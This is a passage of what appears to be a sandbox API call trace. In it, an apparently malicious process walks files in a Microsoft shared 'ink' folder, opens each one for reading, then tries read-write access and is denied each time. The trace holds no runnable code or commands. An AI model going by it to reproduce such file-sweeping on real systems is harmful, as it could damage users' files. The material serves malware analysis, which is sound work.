shared\\ink\\th-TH\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78690 [0100.861] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa08c8602, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.861] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3632db, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3632db, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3632db, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e18 [0100.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.861] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ecf0 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ecf0 | out: hHeap=0x20000) returned 1 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ce30 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ce30 | out: hHeap=0x20000) returned 1 [0100.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.862] AreFileApisANSI () returned 1 [0100.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0100.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.862] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0100.862] AreFileApisANSI () returned 1 [0100.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85440 [0100.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85440, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 73 [0100.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.863] GetFileType (hFile=0x27c) returned 0x1 [0100.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0100.863] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.863] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.863] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.863] CloseHandle (hObject=0x27c) returned 1 [0100.863] AreFileApisANSI () returned 1 [0100.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x859e0 [0100.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui") returned 73 [0100.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\th-TH\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\th-th\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.864] GetLastError () returned 0x5 [0100.864] GetLastError () returned 0x5 [0100.864] SetLastError (dwErrCode=0x5) [0100.864] GetLastError () returned 0x5 [0100.864] SetLastError (dwErrCode=0x5) [0100.864] GetLastError () returned 0x5 [0100.864] SetLastError (dwErrCode=0x5) [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0100.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.864] FindNextFileW (in: hFindFile=0x78690, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8c700, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧☀")) returned 0 [0100.864] FindClose (in: hFindFile=0x78690 | out: hFindFile=0x78690) returned 1 [0100.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e18 | out: hHeap=0x20000) returned 1 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0100.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0100.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.865] AreFileApisANSI () returned 1 [0100.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll", lpUsedDefaultChar=0x0) returned 62 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0100.866] AreFileApisANSI () returned 1 [0100.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e4f8 [0100.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e4f8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll") returned 62 [0100.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.866] GetFileType (hFile=0x368) returned 0x1 [0100.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0100.866] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.866] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.866] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.867] CloseHandle (hObject=0x368) returned 1 [0100.867] AreFileApisANSI () returned 1 [0100.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0100.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e360 [0100.867] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll") returned 62 [0100.867] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\TipRes.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipres.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.867] GetLastError () returned 0x5 [0100.867] GetLastError () returned 0x5 [0100.867] SetLastError (dwErrCode=0x5) [0100.867] GetLastError () returned 0x5 [0100.867] SetLastError (dwErrCode=0x5) [0100.867] GetLastError () returned 0x5 [0100.867] SetLastError (dwErrCode=0x5) [0100.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0100.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0100.867] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.867] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.867] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="tipresx.dll", cAlternateFileName="")) returned 1 [0100.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f428 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0100.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.868] AreFileApisANSI () returned 1 [0100.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll", lpUsedDefaultChar=0x0) returned 63 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0100.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.868] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0100.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.869] AreFileApisANSI () returned 1 [0100.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6dfa8 [0100.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6dfa8, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll") returned 63 [0100.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.869] GetFileType (hFile=0x368) returned 0x1 [0100.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0100.869] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.869] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.869] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.870] CloseHandle (hObject=0x368) returned 1 [0100.870] AreFileApisANSI () returned 1 [0100.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0100.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7e) returned 0x6e140 [0100.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e140, cchWideChar=63 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll") returned 63 [0100.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\tipresx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tipresx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, 